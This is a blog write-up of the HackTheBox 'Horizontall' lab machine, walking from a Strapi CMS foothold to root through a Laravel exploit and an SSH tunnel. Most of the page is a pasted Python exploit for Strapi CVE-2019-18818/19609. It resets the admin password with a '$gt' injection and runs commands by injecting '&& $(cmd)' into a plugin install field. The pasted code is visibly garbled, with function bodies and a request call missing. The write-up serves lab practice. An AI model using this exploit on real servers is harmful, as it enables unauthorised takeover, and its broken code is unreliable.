IT and security stuff

HTB – Horizontall Writeup

I made a video of this room. Unfortunately my mic was muted. So here is the writeup version…

Port scan shows ssh and http services. There is also a hostname to setup in our hosts.
http://horizontall.htb brings us to this website.

I couldn’t find anything interesting with dirseach. I decided to beautify the source code of the website and found something interesting

This app revealed information about a sub-domain : http://api-prod.horizontall.htb which I added to my hosts.
A welcome page and nothing else.
Dirsearch revealed nice stuff.
Going to /admin leads to a login page for “Strapi”.
Found an exploit and decided to try it.
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage:
# Software Link:
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609

#!/usr/bin/env python3

import requests
import json
from cmd import Cmd
import sys

if len(sys.argv) != 2:
    print("[-] Wrong number of arguments provided")
    print("[*] Usage: python3 <url>\n")

class Terminal(Cmd):
    prompt = "$&gt; "
    def default(self, args):

def check_version():
    global url
    print("[+] Checking Strapi CMS Version running")
    version = requests.get(f"{url}/admin/init").text
    version = json.loads(version)
    version = version["data"]["strapiVersion"]
    if version == "3.0.0-beta.17.4":
        print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n")
        print("[-] Version mismatch trying the exploit anyway")

def password_reset():
    global url, jwt
    session = requests.session()
    params = {"code" : {"$gt":0},
            "password" : "SuperStrongPassword1",
            "passwordConfirmation" : "SuperStrongPassword1"
    output ="{url}/admin/auth/reset-password", json = params).text
    response = json.loads(output)
    jwt = response["jwt"]
    username = response["user"]["username"]
    email = response["user"]["email"]

    if "jwt" not in output:
        print("[-] Password reset unsuccessfull\n[-] Exiting now\n\n")
        print(f"[+] Password reset was successfully\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: {jwt}\n\n")
def code_exec(cmd):
    global jwt, url
    print("[+] Triggering Remote code executin\n[*] Rember this is a blind RCE don't expect to see output")
    headers = {"Authorization" : f"Bearer {jwt}"}
    data = {"plugin" : f"documentation &amp;&amp; $({cmd})",
            "port" : "1337"}
    out ="{url}/admin/plugins/install", json = data, headers = headers)

if __name__ == ("__main__"):
    url = sys.argv[1]
    if url.endswith("/"):
        url = url[:-1]
    terminal = Terminal()
I could obtain a reverse shell with this exploit!
After digging a bit, I found the user flag.
More digging led me to some mysql creds.
Unfortunately I couldn’t reach mysql and decided to check for other local services and found something running on port 8000
Using curl I found it was Laravel V8.

A little bit research led me to this exploit. To access the service on the machine I had to create a SSH tunnel. For that, I needed to copy my public key into the machine.

ssh strapi@horizontall.htb -L 8000:localhost:8000
I could now access the service on my local machine and they laravel exploit worked right away. Good for me it was running as root.
I could easily obtain root flag!

2 thoughts on “HTB – Horizontall Writeup

  1. One thing I’m missing and would love to get a better understanding… how did you find the exploit? I tried to search for it, found other non-working exploits (probably because of a different version, of in need of other non-available information), but came up empty…

    1. At first tried one from exploitdb and it did not work. I kept searching on google. I searched exactly “CVE-2021-3129 exploit” and the first link, from Git, was the exploit that worked.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.